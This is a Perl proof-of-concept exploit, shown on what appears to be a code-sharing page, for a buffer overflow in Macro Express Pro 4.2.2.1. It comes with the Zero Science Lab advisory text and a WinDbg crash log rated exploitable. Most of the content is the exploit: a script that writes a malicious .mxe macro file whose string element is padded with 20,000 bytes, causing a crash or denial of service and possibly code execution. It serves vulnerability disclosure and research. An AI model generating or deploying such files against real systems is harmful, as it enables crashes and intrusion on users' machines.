扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 |
#!/usr/local/bin/perl # # # Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC # # # Vendor: Insight Software Solutions, Inc. # Product web page: http://www.macros.com # Affected version: 4.2.2.1 and 4.2.1.1 # # Summary: Macro Express is the premier Windows macro utility. With # Macro Express, you can record, edit and play back mouse and keyboard # macros. Its powerful tools and robust features will make you more # productive. # # Desc: Macro Express Pro suffers from a buffer overflow vulnerability when # importing playable macro files (.mxe) with added large amount of bytes into # the elements: string, integer, float and control. The user input is not # properly sanitized which may give the attackers the possibility for an # arbitrary code execution on the affected system. Failure of exploitation # may result in a denial of service. # # ~ Note: The PoC file is made with the script: # # <OPEN FOLDER Path="%ALLUSERSPROFILE%"/> # # Which when double clicking the .mxe poc file, 100% CPU usage and OS # hanging occurs. # # ~ # # Tested on: Microsoft Windows XP Professional SP3 (EN) # # # ------------------------------------------------------------------- # # (db0.37c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=41414141 ebx=00000000 ecx=00000000 edx=01171cd8 esi=01171cd8 edi=00000000 # eip=7c919af2 esp=0014f288 ebp=0014f2fc iopl=0 nv up ei pl nz na pe nc # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206 # ntdll!RtlpWaitForCriticalSection+0x5b: # 7c919af2 ff4010inc dword ptr [eax+10h]ds:0023:41414151=???????? # 0:000> g # (db0.37c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=41414141 ebx=0116ca00 ecx=0114dc90 edx=41414140 esi=41414140 edi=0014f330 # eip=0042633d esp=0014e870 ebp=0014e8a0 iopl=0 nv up ei ng nz ac pe cy # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010297 # macedit+0x2633d: # 0042633d 8b04b0mov eax,dword ptr [eax+esi*4] ds:0023:46464641=???????? # 0:000> !exploitable # Exploitability Classification: EXPLOITABLE # User Mode Write AV starting at ntdll!RtlpWaitForCriticalSection+0x000000000000005b (Hash=0x351d4e4e.0x3f68114b) # # User mode write access violations that are not near NULL are exploitable. # # ------------------------------------------------------------------- # # # Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # # Zero Science Lab - http://www.zeroscience.mk # # Advisory ID: ZSL-2011-4986 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php # # 06.01.2011 # use strict; print qq{ ------------------------------------------------------------------------------ || | Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC| || |Copyleft (c) 2011, Zero Science Lab | || ------------------------------------------------------------------------------ }; my $bytes = "\x41" x 20000; my $format = "<<Macro Express 4 Playable Macro>>\x0d\x0a". "[string:%$bytes% elements:99 global:true]\x0d\x0a". # Default: string:%T%... "[integer:%N% elements:99 global:true]\x0d\x0a". "[float:%D% elements:99 global:true]\x0d\x0a". "[control:%C% elements:99 global:true]\x0d\x0a". "<<BEGIN SCRIPT>>\x0d\x0a". "<OPEN FOLDER Path=\"%ALLUSERSPROFILE%\"/>"; my $file = "Playable.mxe"; print "\n\n[*] Creating $file file...\n"; open mxe, ">./$file" || die "\nCan't open $file: $!"; print mxe $format; print "\n[.] File successfully mounted!\n\n"; close mxe; |
体验盒子
